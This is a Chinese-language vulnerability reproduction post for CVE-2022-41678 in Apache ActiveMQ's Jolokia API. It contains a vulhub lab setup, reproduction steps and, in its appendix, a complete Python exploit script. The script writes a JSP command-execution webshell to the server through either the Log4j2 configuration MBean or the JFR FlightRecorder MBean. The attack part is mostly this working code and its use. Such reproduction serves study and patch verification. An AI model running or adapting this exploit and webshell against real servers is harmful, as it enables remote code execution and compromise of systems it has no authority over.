【漏洞复现】CVE-2022-41678 Arbitrary JMX Service Invocation with Web Interface

embedded/2024/12/29 2:48:23/

漏洞信息

NVD - cve-2022-41678

Apache ActiveMQ prior to 5.16.5, 5.17.3, there is a authenticated RCE exists in the Jolokia /api/jolokia.

组件影响版本安全版本
Apache:ActiveMQ< 5.16.6>= 5.16.6
Apache:ActiveMQ5.17.0 - 5.17.4>= 5.17.4,>= 6.0.0,>= 5.18.0

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandler#handlePostRequest is able to create JmxRequest through JSONObject. And calls to org.jolokia.http.HttpRequestHandler#executeRequest. Into deeper calling stacks, org.jolokia.handler.ExecHandler#doHandleRequest can be invoked through refection. This could lead to RCE through via various mbeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl which exists on Java version above 11. 1 Call newRecording. 2 Call setConfiguration. And a webshell data hides in it. 3 Call startRecording. 4 Call copyTo method. The webshell will be written to a .jsp file. The mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia. A more restrictive Jolokia configuration has been defined in default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distributions version including updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.

Jolokia是一个JMX通过HTTP的桥接服务,允许通过HTTP请求来操作JMX MBeans。

漏洞的核心是FlightRecorder MBean,这是JDK 11及以上版本中提供的一个功能,用于记录内存、垃圾回收、调用栈等信息。攻击者可以利用以下方法进行攻击:

  • newRecording - 新建一个记录会话
  • setConfiguration - 更改记录会话的配置
  • startRecording - 开始记录
  • stopRecording - 结束记录
  • copyTo - 将记录的数据导出到文件

攻击者首先通过setConfiguration方法修改配置,将一些键名改为JSP代码。这样,在记录的数据中就会包含攻击者注入的JSP代码。然后,攻击者使用copyTo方法将包含恶意代码的记录导出到ActiveMQ的web目录中,从而在服务器上执行远程代码 。

背景介绍

Apache ActiveMQ is an open source messaging middleware developed by the American Pachitea (Apache) Software Foundation that supports Java messaging services, clustering, Spring framework, and more.

主页:https://github.com/vulhub/vulhub/tree/master/activemq

源码:https://github.com/apache/activemq

环境搭建

docker-compose.yaml

version: '2'
services:activemq:image: vulhub/activemq:5.17.3ports:- "61616:61616"- "8161:8161"- "5005:5005"

启动容器:

$ docker-compose up -d

61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。

访问http://127.0.0.1:8161/admin/即可看到web管理页面(账号密码都是admin)

漏洞复现

参考:https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2022-41678

首先,访问/api/jolokia/list这个API可以查看当前服务器里所有的MBeans,其中有两个MBean可以在本次漏洞复现中进行利用:

在这里插入图片描述

第一个方法是使用org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean,这是由Log4j2提供的一个MBean。攻击者使用这个MBean中的setConfigText操作可以更改Log4j的配置,进而将日志文件写入任意目录中。

poc.py位于附录,使用它来复现完整的过程:

python3 poc.py -u admin -p admin http://127.0.0.1:8161

在这里插入图片描述

但是这个方法受到ActiveMQ版本的限制,因为Log4j2是在5.17.0中才引入Apache ActiveMQ。

webshell被写入在/admin/shell.jsp文件中,访问http://127.0.0.1:8161/admin/shell.jsp?cmd=id并通过修改cmd传参即可命令执行:

在这里插入图片描述

第二个可利用的Mbean是jdk.management.jfr.FlightRecorderMXBean

FlightRecorder是在OpenJDK 11中引入的特性,被用于记录Java虚拟机的运行事件。利用这个功能,攻击者可以将事件日志写入任意文件。

poc.py位于附录,使用它来复现完整的过程(使用--exploit参数指定使用的方法):

python3 poc.py -u admin -p admin --exploit jfr http://127.0.0.1:8161

在这里插入图片描述

webshell被写入在/admin/shelljfr.jsp文件中:

在这里插入图片描述

修复方案

activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt

附录

poc.py

#!/usr/bin/env python3
import sys
import logging
import requests
import argparse
import time
from urllib.parse import urljoin
from html import escapelogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
webshell = ('<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); ''out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), "utf-8")); %>')
original_template = r'''<?xml version="1.0" encoding="UTF-8"?>
<Configuration><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%5p | %m%n"/></Console><RollingRandomAccessFile name="RollingFile" fileName="${sys:activemq.data}/activemq.log" filePattern="${sys:activemq.data}/activemq.log.%i"><PatternLayout pattern="%d | %-5p | %m | %c | %t%n%throwable{full}"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile><RollingRandomAccessFile name="AuditLog" fileName="${sys:activemq.data}/audit.log" filePattern="${sys:activemq.data}/audit.log.%i"><PatternLayout pattern="%-5p | %m | %t%n"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile></Appenders><Loggers><Root level="INFO"><AppenderRef ref="Console"/><AppenderRef ref="RollingFile"/></Root><Logger name="org.apache.activemq.spring" level="WARN"/><Logger name="org.apache.activemq.web.handler" level="WARN"/><Logger name="org.springframework" level="WARN"/><Logger name="org.apache.xbean" level="WARN"/><Logger name="org.eclipse.jetty" level="WARN"/><Logger name="org.apache.activemq.audit" level="INFO" additivity="false"><AppenderRef ref="AuditLog"/></Logger><!-- Uncomment and modify as needed for ActiveMQ logger<Logger name="org.apache.activemq" level="DEBUG"/>--></Loggers>
</Configuration>
'''
evil_template = r'''<?xml version="1.0" encoding="UTF-8"?>
<Configuration><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%5p | %m%n"/></Console><RollingRandomAccessFile name="RollingFile" fileName="${sys:activemq.data}/../webapps/admin/shell.jsp" filePattern="${sys:activemq.data}/../webapps/admin/shell.jsp.%i"><PatternLayout pattern="%d | %-5p | %m | %c | %t%n%throwable{full}"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile><RollingRandomAccessFile name="AuditLog" fileName="${sys:activemq.data}/audit.log" filePattern="${sys:activemq.data}/audit.log.%i"><PatternLayout pattern="%-5p | %m | %t%n"/><Policies><SizeBasedTriggeringPolicy size="1MB"/></Policies></RollingRandomAccessFile></Appenders><Loggers><Root level="INFO"><AppenderRef ref="Console"/><AppenderRef ref="RollingFile"/></Root><Logger name="org.apache.activemq.spring" level="WARN"/><Logger name="org.apache.activemq.web.handler" level="WARN"/><Logger name="org.springframework" level="WARN"/><Logger name="org.apache.xbean" level="WARN"/><Logger name="org.eclipse.jetty" level="DEBUG"/><Logger name="org.apache.activemq.audit" level="INFO" additivity="false"><AppenderRef ref="AuditLog"/></Logger><!-- Uncomment and modify as needed for ActiveMQ logger<Logger name="org.apache.activemq" level="DEBUG"/>--></Loggers>
</Configuration>
'''
record_template = r'''<?xml version="1.0" encoding="UTF-8"?><!--Recommended way to edit .jfc files is to use Java Mission Control,see Window -> Flight Recorder Template Manager.
--><configuration version="2.0" label="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle"><event name="jdk.ThreadAllocationStatistics"><setting name="enabled">true</setting><setting name="period"><![CDATA[||| '''+webshell+r''' |||]]></setting></event><event name="jdk.ClassLoadingStatistics"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ClassLoaderStatistics"><setting name="enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.JavaThreadStatistics"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ThreadStart"><setting name="enabled">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ThreadEnd"><setting name="enabled">true</setting></event><event name="jdk.ThreadSleep"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.ThreadPark"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.JavaMonitorEnter"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.JavaMonitorWait"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.JavaMonitorInflate"><setting name="enabled">false</setting><setting name="stackTrace">true</setting><setting name="threshold" control="synchronization-threshold">20 ms</setting></event><event name="jdk.BiasedLockRevocation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.BiasedLockSelfRevocation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.BiasedLockClassRevocation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ReservedStackActivation"><setting name="enabled">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ClassLoad"><setting name="enabled" control="class-loading-enabled">false</setting><setting name="stackTrace">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ClassDefine"><setting name="enabled" control="class-loading-enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.ClassUnload"><setting name="enabled" control="class-loading-enabled">false</setting></event><event name="jdk.JVMInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.InitialSystemProperty"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.ExecutionSample"><setting name="enabled" control="method-sampling-enabled">true</setting><setting name="period" control="method-sampling-java-interval">20 ms</setting></event><event name="jdk.NativeMethodSample"><setting name="enabled" control="method-sampling-enabled">true</setting><setting name="period" control="method-sampling-native-interval">20 ms</setting></event><event name="jdk.SafepointBegin"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointStateSynchronization"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointWaitBlocked"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointCleanup"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointCleanupTask"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.SafepointEnd"><setting name="enabled">false</setting><setting name="threshold">10 ms</setting></event><event name="jdk.ExecuteVMOperation"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.Shutdown"><setting name="enabled">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ThreadDump"><setting name="enabled" control="thread-dump-enabled">true</setting><setting name="period" control="thread-dump-interval">everyChunk</setting></event><event name="jdk.IntFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.UnsignedIntFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.LongFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.UnsignedLongFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.DoubleFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.BooleanFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.StringFlag"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.IntFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.UnsignedIntFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.LongFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.UnsignedLongFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.DoubleFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.BooleanFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.StringFlagChanged"><setting name="enabled">true</setting></event><event name="jdk.ObjectCount"><setting name="enabled" control="memory-profiling-enabled-all">false</setting><setting name="period">everyChunk</setting></event><event name="jdk.GCConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.GCHeapConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.YoungGenerationConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.GCTLABConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.GCSurvivorConfiguration"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.ObjectCountAfterGC"><setting name="enabled">false</setting></event><event name="jdk.GCHeapSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.PSHeapSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1HeapSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.MetaspaceSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.MetaspaceGCThreshold"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.MetaspaceAllocationFailure"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.MetaspaceOOM"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.MetaspaceChunkFreeListSummary"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.GarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ParallelOldGarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.YoungGarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.OldGarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.G1GarbageCollection"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePause"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel1"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel2"><setting name="enabled" control="gc-enabled-normal">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel3"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhasePauseLevel4"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCPhaseConcurrent"><setting name="enabled" control="gc-enabled-all">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.GCReferenceStatistics"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.PromotionFailed"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.EvacuationFailed"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.EvacuationInformation"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1MMU"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1EvacuationYoungStatistics"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1EvacuationOldStatistics"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1BasicIHOP"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1AdaptiveIHOP"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.PromoteObjectInNewPLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting></event><event name="jdk.PromoteObjectOutsidePLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting></event><event name="jdk.ConcurrentModeFailure"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.AllocationRequiringGC"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.TenuringDistribution"><setting name="enabled" control="gc-enabled-normal">true</setting></event><event name="jdk.G1HeapRegionInformation"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="period">everyChunk</setting></event><event name="jdk.G1HeapRegionTypeChange"><setting name="enabled" control="gc-enabled-all">false</setting></event><event name="jdk.ShenandoahHeapRegionInformation"><setting name="enabled" control="gc-enabled-all">false</setting><setting name="period">everyChunk</setting></event><event name="jdk.ShenandoahHeapRegionStateChange"><setting name="enabled" control="gc-enabled-all">false</setting></event><event name="jdk.OldObjectSample"><setting name="enabled" control="memory-leak-detection-enabled">true</setting><setting name="stackTrace" control="memory-leak-detection-stack-trace">false</setting><setting name="cutoff" control="memory-leak-detection-cutoff">0 ns</setting></event><event name="jdk.CompilerConfiguration"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CompilerStatistics"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.Compilation"><setting name="enabled" control="compiler-enabled">true</setting><setting name="threshold" control="compiler-compilation-threshold">1000 ms</setting></event><event name="jdk.CompilerPhase"><setting name="enabled" control="compiler-enabled">true</setting><setting name="threshold" control="compiler-phase-threshold">60 s</setting></event><event name="jdk.CompilationFailure"><setting name="enabled" control="compiler-enabled-failure">false</setting></event><event name="jdk.CompilerInlining"><setting name="enabled" control="compiler-enabled-failure">false</setting></event><event name="jdk.CodeSweeperConfiguration"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CodeSweeperStatistics"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.SweepCodeCache"><setting name="enabled" control="compiler-enabled">true</setting><setting name="threshold" control="compiler-sweeper-threshold">100 ms</setting></event><event name="jdk.CodeCacheConfiguration"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CodeCacheStatistics"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.CodeCacheFull"><setting name="enabled" control="compiler-enabled">true</setting></event><event name="jdk.OSInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.VirtualizationInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.CPUInformation"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.ThreadContextSwitchRate"><setting name="enabled" control="compiler-enabled">true</setting><setting name="period">10 s</setting></event><event name="jdk.CPULoad"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ThreadCPULoad"><setting name="enabled">true</setting><setting name="period">10 s</setting></event><event name="jdk.CPUTimeStampCounter"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.SystemProcess"><setting name="enabled">true</setting><setting name="period">endChunk</setting></event><event name="jdk.NetworkUtilization"><setting name="enabled">true</setting><setting name="period">5 s</setting></event><event name="jdk.InitialEnvironmentVariable"><setting name="enabled">true</setting><setting name="period">beginChunk</setting></event><event name="jdk.PhysicalMemory"><setting name="enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.ObjectAllocationInNewTLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.ObjectAllocationOutsideTLAB"><setting name="enabled" control="memory-profiling-enabled-medium">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.NativeLibrary"><setting name="enabled">true</setting><setting name="period">everyChunk</setting></event><event name="jdk.ModuleRequire"><setting name="enabled">true</setting><setting name="period">endChunk</setting></event><event name="jdk.ModuleExport"><setting name="enabled">true</setting><setting name="period">endChunk</setting></event><event name="jdk.FileForce"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="file-io-threshold">20 ms</setting></event><event name="jdk.FileRead"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="file-io-threshold">20 ms</setting></event><event name="jdk.FileWrite"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="file-io-threshold">20 ms</setting></event><event name="jdk.SocketRead"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="socket-io-threshold">20 ms</setting></event><event name="jdk.SocketWrite"><setting name="enabled">true</setting><setting name="stackTrace">true</setting><setting name="threshold" control="socket-io-threshold">20 ms</setting></event><event name="jdk.SecurityPropertyModification"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.TLSHandshake"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.X509Validation"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.X509Certificate"><setting name="enabled">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.JavaExceptionThrow"><setting name="enabled" control="enable-exceptions">false</setting><setting name="stackTrace">true</setting></event><event name="jdk.JavaErrorThrow"><setting name="enabled" control="enable-errors">true</setting><setting name="stackTrace">true</setting></event><event name="jdk.ExceptionStatistics"><setting name="enabled">true</setting><setting name="period">1000 ms</setting></event><event name="jdk.ActiveRecording"><setting name="enabled">true</setting></event><event name="jdk.ActiveSetting"><setting name="enabled">true</setting></event><event name="jdk.DataLoss"><setting name="enabled">true</setting></event><event name="jdk.DumpReason"><setting name="enabled">true</setting></event><event name="jdk.ZPageAllocation"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.ZThreadPhase"><setting name="enabled">true</setting><setting name="threshold">0 ms</setting></event><event name="jdk.ZStatisticsCounter"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><event name="jdk.ZStatisticsSampler"><setting name="enabled">true</setting><setting name="threshold">10 ms</setting></event><!--Contents of the control element is not read by the JVM, it's usedby Java Mission Control to change settings that carry the control attribute.--><control><selection name="gc-level" default="detailed" label="Garbage Collector"><option label="Off" name="off">off</option><option label="Normal" name="detailed">normal</option><option label="All" name="all">all</option></selection><condition name="gc-enabled-normal" true="true" false="false"><or><test name="gc-level" operator="equal" value="normal"/><test name="gc-level" operator="equal" value="all"/></or></condition><condition name="gc-enabled-all" true="true" false="false"><test name="gc-level" operator="equal" value="all"/></condition><selection name="memory-profiling" default="off" label="Memory Profiling"><option label="Off" name="off">off</option><option label="Object Allocation and Promotion" name="medium">medium</option><option label="All, including Heap Statistics (May cause long full GCs)" name="all">all</option></selection><condition name="memory-profiling-enabled-medium" true="true" false="false"><or><test name="memory-profiling" operator="equal" value="medium"/><test name="memory-profiling" operator="equal" value="all"/></or></condition><condition name="memory-profiling-enabled-all" true="true" false="false"><test name="memory-profiling" operator="equal" value="all"/></condition><selection name="compiler-level" default="normal" label="Compiler"><option label="Off" name="off">off</option><option label="Normal" name="normal">normal</option><option label="Detailed" name="detailed">detailed</option><option label="All" name="all">all</option></selection><condition name="compiler-enabled" true="false" false="true"><test name="compiler-level" operator="equal" value="off"/></condition><condition name="compiler-enabled-failure" true="true" false="false"><or><test name="compiler-level" operator="equal" value="detailed"/><test name="compiler-level" operator="equal" value="all"/></or></condition><condition name="compiler-sweeper-threshold" true="0 ms" false="100 ms"><test name="compiler-level" operator="equal" value="all"/></condition><condition name="compiler-compilation-threshold" true="1000 ms"><test name="compiler-level" operator="equal" value="normal"/></condition><condition name="compiler-compilation-threshold" true="100 ms"><test name="compiler-level" operator="equal" value="detailed"/></condition><condition name="compiler-compilation-threshold" true="0 ms"><test name="compiler-level" operator="equal" value="all"/></condition><condition name="compiler-phase-threshold" true="60 s"><test name="compiler-level" operator="equal" value="normal"/></condition><condition name="compiler-phase-threshold" true="10 s"><test name="compiler-level" operator="equal" value="detailed"/></condition><condition name="compiler-phase-threshold" true="0 s"><test name="compiler-level" operator="equal" value="all"/></condition><selection name="method-sampling-interval" default="normal" label="Method Sampling"><option label="Off" name="off">off</option><option label="Normal" name="normal">normal</option><option label="High" name="high">high</option><option label="Ludicrous (High Overhead)" name="ludicrous">ludicrous</option></selection><condition name="method-sampling-java-interval" true="999 d"><test name="method-sampling-interval" operator="equal" value="off"/></condition><condition name="method-sampling-java-interval" true="20 ms"><test name="method-sampling-interval" operator="equal" value="normal"/></condition><condition name="method-sampling-java-interval" true="10 ms"><test name="method-sampling-interval" operator="equal" value="high"/></condition><condition name="method-sampling-java-interval" true="1 ms"><test name="method-sampling-interval" operator="equal" value="ludicrous"/></condition><condition name="method-sampling-native-interval" true="999 d"><test name="method-sampling-interval" operator="equal" value="off"/></condition><condition name="method-sampling-native-interval" true="20 ms"><or><test name="method-sampling-interval" operator="equal" value="normal"/><test name="method-sampling-interval" operator="equal" value="high"/><test name="method-sampling-interval" operator="equal" value="ludicrous"/></or></condition>  <condition name="method-sampling-enabled" true="false" false="true"><test name="method-sampling-interval" operator="equal" value="off"/></condition><selection name="thread-dump-interval" default="normal" label="Thread Dump"><option label="Off" name="off">999 d</option><option label="At least Once" name="normal">everyChunk</option><option label="Every 60 s" name="everyMinute">60 s</option><option label="Every 10 s" name="everyTenSecond">10 s</option><option label="Every 1 s" name="everySecond">1 s</option></selection><condition name="thread-dump-enabled" true="false" false="true"><test name="thread-dump-interval" operator="equal" value="999 d"/></condition><selection name="exception-level" default="errors" label="Exceptions"><option label="Off" name="off">off</option><option label="Errors Only" name="errors">errors</option><option label="All Exceptions, including Errors" name="all">all</option></selection><condition name="enable-errors" true="true" false="false"><or><test name="exception-level" operator="equal" value="errors"/><test name="exception-level" operator="equal" value="all"/></or></condition><condition name="enable-exceptions" true="true" false="false"><test name="exception-level" operator="equal" value="all"/></condition><selection name="memory-leak-detection" default="minimal" label="Memory Leak Detection"><option label="Off" name="off">off</option><option label="Object Types" name="minimal">minimal</option><option label="Object Types + Allocation Stack Traces" name="medium">medium</option><option label="Object Types + Allocation Stack Traces + Path to GC Root" name="full">full</option></selection><condition name="memory-leak-detection-enabled" true="false" false="true"><test name="memory-leak-detection" operator="equal" value="off"/></condition><condition name="memory-leak-detection-stack-trace" true="true" false="false"><or><test name="memory-leak-detection" operator="equal" value="medium"/><test name="memory-leak-detection" operator="equal" value="full"/></or></condition><condition name="memory-leak-detection-cutoff" true="1 h" false="0 ns"><test name="memory-leak-detection" operator="equal" value="full"/></condition><text name="synchronization-threshold" label="Synchronization Threshold" contentType="timespan" minimum="0 s">20 ms</text><text name="file-io-threshold" label="File I/O Threshold" contentType="timespan" minimum="0 s">20 ms</text><text name="socket-io-threshold" label="Socket I/O Threshold" contentType="timespan" minimum="0 s">20 ms</text><flag name="class-loading-enabled" label="Class Loading">false</flag></control></configuration>
'''class Application(object):def __init__(self, url, username, password):self.url = urlself.session = requests.session()self.session.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ''Chrome/117.0.5938.132 Safari/537.36','Origin': url,}self.session.auth = (username, password)def request(self, method: str, path: str, *args, **kwargs):data = self.session.request(method, urljoin(self.url, path), *args, **kwargs).json()assert data['status'] == 200return datadef find_mbean_name(self):data = self.request('GET', '/api/jolokia/list')for name, val in data['value'].items():if name == 'org.apache.logging.log4j2':for type_name in val.keys():if type_name.startswith('type='):return f'{name}:{type_name}'for name, val in data['value'].items():if name == 'jdk.management.jfr':for type_name in val.keys():if type_name == 'type=FlightRecorder':return f'{name}:{type_name}'raise Exception('No mbean whose name is org.apache.logging.log4j2 or jdk.management.jfr')def modify_config(self, mbean: str, template: str):self.request('POST', '/api/jolokia/', json=dict(type='exec',mbean=mbean,operation='setConfigText',arguments=[template, 'utf-8']))def exploit_log4j(self, mbean: str):self.modify_config(mbean, evil_template)logging.info('update log config')self.request('GET', '/api/jolokia/version', headers={'User-Agent': f'Mozilla ||| {webshell} |||'})logging.info('write webshell to %s', urljoin(self.url, '/admin/shell.jsp?cmd=id'))self.modify_config(mbean, original_template)logging.info('restore log config')def exploit_jfr(self):record_id = self.create_record()logging.info('create flight record, id = %d', record_id)self.request('POST', '/api/jolokia/', json=dict(type='exec',mbean='jdk.management.jfr:type=FlightRecorder',operation='setConfiguration',arguments=[record_id, record_template]))logging.info('update configuration for record %d', record_id)self.request('POST', '/api/jolokia/', json=dict(type='exec',mbean='jdk.management.jfr:type=FlightRecorder',operation='startRecording',arguments=[record_id]))logging.info('start record')time.sleep(1)self.request('POST', '/api/jolokia/', json=dict(type='exec',mbean='jdk.management.jfr:type=FlightRecorder',operation='stopRecording',arguments=[record_id]))logging.info('stop record')self.request('POST', '/api/jolokia/', json=dict(type='exec',mbean='jdk.management.jfr:type=FlightRecorder',operation='copyTo',arguments=[record_id, 'webapps/admin/shelljfr.jsp']))logging.info('write webshell to %s', urljoin(self.url, '/admin/shelljfr.jsp?cmd=id'))def exploit(self, action='auto'):mbean = self.find_mbean_name()if action == 'log4j':logging.info('choice MBean org.apache.logging.log4j2 manually')self.exploit_log4j(mbean)elif action == 'jfr':logging.info('choice MBean jdk.management.jfr:type=FlightRecorder manually')self.exploit_jfr()elif mbean.startswith('org.apache.logging.log4j2'):logging.info('choice MBean %r automatically', mbean)self.exploit_log4j(mbean)else:logging.info('choice MBean %r automatically', mbean)self.exploit_jfr()def create_record(self):data = self.request('POST', '/api/jolokia/', json=dict(type='exec',mbean='jdk.management.jfr:type=FlightRecorder',operation='newRecording',arguments=[]))return data['value']def main():parser = argparse.ArgumentParser(description='Attack Apache ActiveMQ')parser.add_argument('--username', '-u', type=str, default='admin', help='Username for the ActiveMQ console')parser.add_argument('--password', '-p', type=str, default='admin', help='Password for the ActiveMQ console')parser.add_argument('--exploit', '-e', type=str, default='auto', choices=['auto', 'log4j', 'jfr'], help='Exploit')parser.add_argument('url', type=str)args = parser.parse_args()app = Application(args.url, args.username, args.password)app.exploit(args.exploit)if __name__ == '__main__':main()

